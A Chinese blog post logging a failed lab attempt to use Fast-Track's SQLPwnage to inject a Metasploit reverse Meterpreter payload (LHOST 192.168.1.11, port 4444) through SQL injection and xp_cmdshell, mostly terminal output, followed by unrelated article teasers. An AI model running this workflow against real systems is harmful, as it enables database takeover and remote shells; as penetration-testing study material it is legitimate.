fasttrack的SQLPwnage（失败）

时间：2023-04-26 18:33:56浏览次数：34

标签：Sending 15 fasttrack ... may SQLPwnage 失败 take bit

这次也是失败的，操作如下：

root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
Fast-Track Main Menu:

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Nmap Scripting Engine
    4.  Microsoft SQL Tools
    5.  Mass Client-Side Attack
    6.  Exploits
    7.  Binary to Hex Payload Converter
    8.  Payload Generator
    9.  Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

    Enter the number: 4

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

    Enter your choice : 3

    SQLPwnage Main Menu:

    1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND)
    2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED)
    3. SQL Injection single URL exploitation

    <ctrl>-c to Cancel

    Enter your choice: 1
Scan a subnet or spider single URL?

        1. url 
        2. subnet (new)
        3. subnet (lists last scan)

        Enter the Number: 1

Enter IP address (ex: www.xxxxx.com): http://192.168.1.109/login.jsp
http://192.168.1.109/login.jsp
50000
Crawling http://192.168.1.109/login.jsp (Max Depth: 50000)
DONE
Found 0 links, following 0 urls in 0+0:0:0

Spidering is complete.

*************************************************************************
http://192.168.1.109/login.jsp
*************************************************************************


[+] Number of forms detected: 2 [+]


What type of payload do you want?

1. Custom Packed Fast-Track Reverse Payload (AV Safe)
2. Metasploit Reverse VNC Inject (Requires Metasploit)
3. Metasploit Meterpreter Payload (Requires Metasploit)
4. Metasploit TCP Bind Shell (Requires Metasploit)

Select your choice: 3
Enter the port you want to listen on: 4444
[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.11", "LPORT"=>"4444"}
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 3 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 4 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 5 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 6 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 7 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 8 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 9 of 9. This may take a bit. [+]
[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]
[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 15, this may take a bit...
Sending chunk 2 of 15, this may take a bit...
Sending chunk 3 of 15, this may take a bit...
Sending chunk 4 of 15, this may take a bit...
Sending chunk 5 of 15, this may take a bit...
Sending chunk 6 of 15, this may take a bit...
Sending chunk 7 of 15, this may take a bit...
Sending chunk 8 of 15, this may take a bit...
Sending chunk 9 of 15, this may take a bit...
Sending chunk 10 of 15, this may take a bit...
Sending chunk 11 of 15, this may take a bit...
Sending chunk 12 of 15, this may take a bit...
Sending chunk 13 of 15, this may take a bit...
Sending chunk 14 of 15, this may take a bit...
Sending chunk 15 of 15, this may take a bit...
Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
You should have a shell if everything went good..Might take a couple seconds

这个也要在图形界面下运行才行，除非修改代码。

操作失败了，原因和上次一样：

在XP上生成的h2b.exe无法运行。

标签：Sending,15,fasttrack,...,may,SQLPwnage,失败,take,bit
From： https://blog.51cto.com/u_1002776/6228456

关于idea使用Tomcat打开jsp文件页面失败的问题的解决
问题描述在idea里面使用Tomcat打开jsp文件频繁报错，检查相关路径也没有任何问题，而且用来测试的jsp文件还是最简单的形式，困扰了大概5分钟左右问题解决经过查询百度可知，这次不是路径的问题，而是需要将我们在web文件夹里面创建的jsp文件复制到target文件夹里面保持与target文件夹里......
服务器断电后启动失败报错：Generating /run/initramfs/rdsosreport.txt
一、现象服务器断电，然后启动时发现起不来，连接显示器发现报错，如下所示：原因：一般是服务器突然断电导致文件损坏所致，只要修复回去就好二、解决过程2.1寻找/dev/*-root文件说明： /dev/mapper目录下一般有三个文件，其中 centos-root是我们需要修复的。有些服务器的文件名称......
关于conda在创建虚拟环境时使用env.yaml安装pip的开源git包失败的解决办法
以下env.yaml配置为例:name:alpacachannels:-pytorch-defaultsdependencies:-python=3.8.5-pip=20.3-cudatoolkit=11.3-pytorch=2.0.0-numpy=1.19.2-pip:-datasets-loralib-sentencepiece-accelerate-bitsan......
SQL2005_用户_'sa'_登录失败。该用户与可信_SQL_Server_连接无关联解决办法
[code]如果安装sqlserver2005的时候，设置的身份验证模式为"windows"，安装完成后，再设置为"sqlserver和windows"的身份验证模式，如果安装sqlserver2005的时候，设置的身份验证模式为"windows"，安装完成后，再设置为"sqlserver和windows"的身份验证模式，......
SpringSecurity从入门到精通：从数据库查询权限信息&自定义失败处理
从数据库查询权限信息记得打开redis 自定义失败处理我们还希望在认证失败或者是授权失败的情况下也能和我们的接口一样返回相同结构的json，这样可以让前端能对响应进行统一的处理。要实现这个功能我们需要知道SpringSecurity......
从数据库查询权限信息与自定义失败处理
从数据库查询权限信息代码实现我们只需要根据用户id去查询到其所对应的权限信息即可。所以我们可以先定义个mapper，其中提供一个方法可以根据userid查询权限信息。packagecom.example.qinghuatokendemo.Mapper;importc......
凭证导入失败问题
在使用用友实施工具导入凭证时，有部份成功，原因为部份单元格应该为文本格式，即在数字或者文本前加逗号，如下图解释如下：数字前面的逗号是为了防止数字过长造成系统会把数字给截断形成科学计数法，强制让数字成为文本格式。如果你不想要这个逗号，可以先把单元格的格式设置为“文本”格式，再......
win10安装openssh失败，使用离线安装包
在win平台使用openssh时，需要安装openssh的客户端和服务端。有时使用微软官方推荐的设置-应用-可选应用安装时会出错，重启也不能解决。这时建议使用离线安装包一键安装。github安装包链接：Releases·PowerShell/Win32-OpenSSH(github.com)https://github.com/PowerShell/Win32-......
Springboot日期注解失败：while it seems to fit format ‘yyyy-MM-dd‘T‘HH:mm:ss.SSS
提交字符串到后台映射为Date类型可以加上@DateTimeFormat(pattern="yyyy-MM-ddHH:mm:ss")注解，但是报错了！前端提交字符串到后台，出现如下错误：whileitseemstofitformat'yyyy-MM-dd'T'HH:mm:ss.SSSZ',parsingfails(leniency?null))错误的大致意思就是字符串映射到Da......
[问题记录]k8s集群中coredns解析失败
目录[问题记录]k8s集群中coredns解析失败故障现象问题排查问题解析举例说明：解决方案修改ndots参数参考文档[问题记录]k8s集群中coredns解析失败故障现象在k8s集群，使用coredns提供集群内部dns服务但是在使用过程中，偶现解析公网域名失败的情况，应用内日志记录显示UnknownHost问......

fasttrack的SQLPwnage（失败）

相关文章

赞助商

阅读排行